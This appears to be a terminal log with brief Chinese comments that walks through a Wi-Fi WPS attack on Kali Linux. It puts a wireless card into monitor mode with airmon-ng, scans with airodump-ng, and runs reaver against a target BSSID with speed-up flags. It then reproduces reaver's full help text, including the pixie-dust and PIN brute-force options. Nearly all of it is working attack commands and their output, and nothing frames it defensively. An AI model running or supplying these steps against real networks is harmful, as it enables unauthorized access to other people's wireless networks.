┌──(***㉿kali)-[~]
└─$ iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
wlan0 IEEE 802.11 ESSID:"当前链接的名称" #无线网卡的接口名称是wlan0
Mode:Managed Frequency:2.462 GHz Access Point: (BSSID) **:**:**:**:**:** 省略功率等信息
┌──(***㉿kali)-[~]
└─$ sudo airmon-ng start wlan0 # 监控模式
[sudo] *** 的密码:
Found 2 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode
PID Name
709 NetworkManager
772 wpa_supplicant
PHY Interface Driver Chipset
phy0 wlan0 ath10k_pci Qualcomm Atheros QCA9377 802.11ac Wireless Network Adapter (rev 31)
(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)
关闭
┌──(***㉿kali)-[~]
└─$ iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
wlan0mon IEEE 802.11 Mode:Monitor Frequency:2.457 GHz Tx-Power=-2147483648 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
┌──(***㉿kali)-[~]
└─$ sudo airmon-ng stop wlan0mon
PHY Interface Driver Chipset
phy0 wlan0mon ath10k_pci Qualcomm Atheros QCA9377 802.11ac Wireless Network Adapter (rev 31)
(mac80211 station mode vif enabled on [phy0]wlan0)
(mac80211 monitor mode vif disabled for [phy0]wlan0mon)
┌──(***㉿kali)-[~]
└─$ sudo airodump-ng wlan0
Interface wlan0:
ioctl(SIOCGIFINDEX) failed: No such device
┌──(***㉿kali)-[~]
└─$ sudo airodump-ng wlan0mon
reaver
reaver -i wlan0mon -b BSSID -a -S -d9 -t9 -vv
$ reaver -h
Reaver v1.6.6 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
Required Arguments:
-i, --interface=<wlan> Name of the monitor-mode interface to use
-b, --bssid=<mac> BSSID of the target AP
Optional Arguments:
-m, --mac=<mac> MAC of the host system
-e, --essid=<ssid> ESSID of the target AP
-c, --channel=<channel> Set the 802.11 channel for the interface (implies -f)
-s, --session=<file> Restore a previous session file
-C, --exec=<command> Execute the supplied command upon successful pin recovery
-f, --fixed Disable channel hopping
-5, --5ghz Use 5GHz 802.11 channels
-v, --verbose Display non-critical warnings (-vv or -vvv for more)
-q, --quiet Only display critical messages
-h, --help Show help
Advanced Options:
-p, --pin=<wps pin> Use the specified pin (may be arbitrary string or 4/8 digit WPS pin)
-d, --delay=<seconds> Set the delay between pin attempts [1]
-l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]
-g, --max-attempts=<num> Quit after num pin attempts
-x, --fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0]
-r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts
-t, --timeout=<seconds> Set the receive timeout period [10]
-T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.40]
-A, --no-associate Do not associate with the AP (association must be done by another application)
-N, --no-nacks Do not send NACK messages when out of order packets are received
-S, --dh-small Use small DH keys to improve crack speed
-L, --ignore-locks Ignore locked state reported by the target AP
-E, --eap-terminate Terminate each WPS session with an EAP FAIL packet
-J, --timeout-is-nack Treat timeout as NACK (DIR-300/320)
-F, --ignore-fcs Ignore frame checksum errors
-w, --win7 Mimic a Windows 7 registrar [False]
-K, --pixie-dust Run pixiedust attack
-Z Run pixiedust attack
-O, --output-file=<filename> Write packets of interest into pcap file
Example:
reaver -i wlan0mon -b 00:90:4C:C1:AC:21 -vv